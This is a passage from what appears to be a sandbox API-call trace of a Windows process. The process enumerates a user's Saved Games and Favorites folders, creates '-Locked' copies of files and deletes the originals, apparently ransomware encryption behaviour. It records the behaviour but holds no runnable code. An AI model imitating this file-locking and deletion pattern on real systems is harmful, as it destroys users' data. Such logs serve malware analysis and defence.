ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x35b5d25e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.166] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x35b5d25e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.167] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b13f1e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35b13f1e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35b13f1e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0307.167] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0307.167] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0307.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0307.168] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0307.168] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Saved Games", lpFilePart=0x0) returned 0x21 [0307.168] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\", lpFilePart=0x0) returned 0x22 [0307.168] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35b5d25e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35b5d25e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.168] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35b5d25e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35b5d25e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.168] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b13f1e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35b13f1e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35b13f1e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0307.169] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b13f1e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35b13f1e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35b13f1e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 0 [0307.169] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0307.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0307.169] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x3b [0307.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.169] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\saved games\\desktop.ini-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.170] GetFileType (hFile=0x49c) returned 0x1 [0307.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.170] GetFileType (hFile=0x49c) returned 0x1 [0307.171] CloseHandle (hObject=0x49c) returned 1 [0307.172] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini-Locked", lpFilePart=0x0) returned 0x34 [0307.172] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\saved games\\desktop.ini-locked")) returned 1 [0307.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0307.178] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites", lpFilePart=0x0) returned 0x1f [0307.179] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\", lpFilePart=0x0) returned 0x20 [0307.179] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x34c1b5fa, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.179] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x34c1b5fa, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.179] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34baf464, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34baf464, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34baf464, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bing.url-Locked", cAlternateFileName="BING~1.URL")) returned 1 [0307.180] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34bfc26c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34bfc26c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34bfc26c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0307.180] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34c2a132, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c2a132, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0307.180] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34c2a132, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c2a132, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 0 [0307.180] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0307.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0307.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0307.181] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites", lpFilePart=0x0) returned 0x1f [0307.181] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\", lpFilePart=0x0) returned 0x20 [0307.181] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34c1b5fa, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c1b5fa, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.181] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34c1b5fa, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c1b5fa, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.181] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34baf464, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34baf464, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34baf464, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bing.url-Locked", cAlternateFileName="BING~1.URL")) returned 1 [0307.181] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34bfc26c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34bfc26c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34bfc26c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0307.182] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34c2a132, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c2a132, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0307.182] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0307.182] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0307.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0307.182] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url-Locked-Locked", lpFilePart=0x0) returned 0x36 [0307.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.182] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\bing.url-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.240] GetFileType (hFile=0x49c) returned 0x1 [0307.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.284] GetFileType (hFile=0x49c) returned 0x1 [0307.286] CloseHandle (hObject=0x49c) returned 1 [0307.287] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url-Locked", lpFilePart=0x0) returned 0x2f [0307.287] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\bing.url-locked")) returned 1 [0307.291] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x39 [0307.291] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.291] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\desktop.ini-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.293] GetFileType (hFile=0x49c) returned 0x1 [0307.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.293] GetFileType (hFile=0x49c) returned 0x1 [0307.295] CloseHandle (hObject=0x49c) returned 1 [0307.295] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini-Locked", lpFilePart=0x0) returned 0x32 [0307.295] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\desktop.ini-locked")) returned 1 [0307.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0307.299] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links", lpFilePart=0x0) returned 0x25 [0307.299] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\", lpFilePart=0x0) returned 0x26 [0307.301] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34c2a132, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c2a132, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.301] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34c2a132, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c2a132, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.301] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34c23e52, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34c23e52, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c23e52, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0307.301] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0307.301] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0307.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0307.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0307.302] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links", lpFilePart=0x0) returned 0x25 [0307.302] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\", lpFilePart=0x0) returned 0x26 [0307.302] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34c2a132, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c2a132, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.302] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34c2a132, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c2a132, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.302] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34c23e52, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34c23e52, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c23e52, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0307.303] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34c23e52, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34c23e52, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c23e52, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 0 [0307.303] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0307.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0307.316] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x3f [0307.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0307.316] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links\\desktop.ini-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.334] GetFileType (hFile=0x49c) returned 0x1 [0307.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0307.334] GetFileType (hFile=0x49c) returned 0x1 [0307.336] CloseHandle (hObject=0x49c) returned 1 [0307.337] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini-Locked", lpFilePart=0x0) returned 0x38 [0307.337] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links\\desktop.ini-locked")) returned 1 [0307.389] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links", nBufferLength=0x105, lpBuffer=0x1aed14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links", lpFilePart=0x0) returned 0x25 [0307.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af160) returned 1 [0307.389] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links"), fInfoLevelId=0x0, lpFileInformation=0x1af1e0 | out: lpFileInformation=0x1af1e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x379598d3, 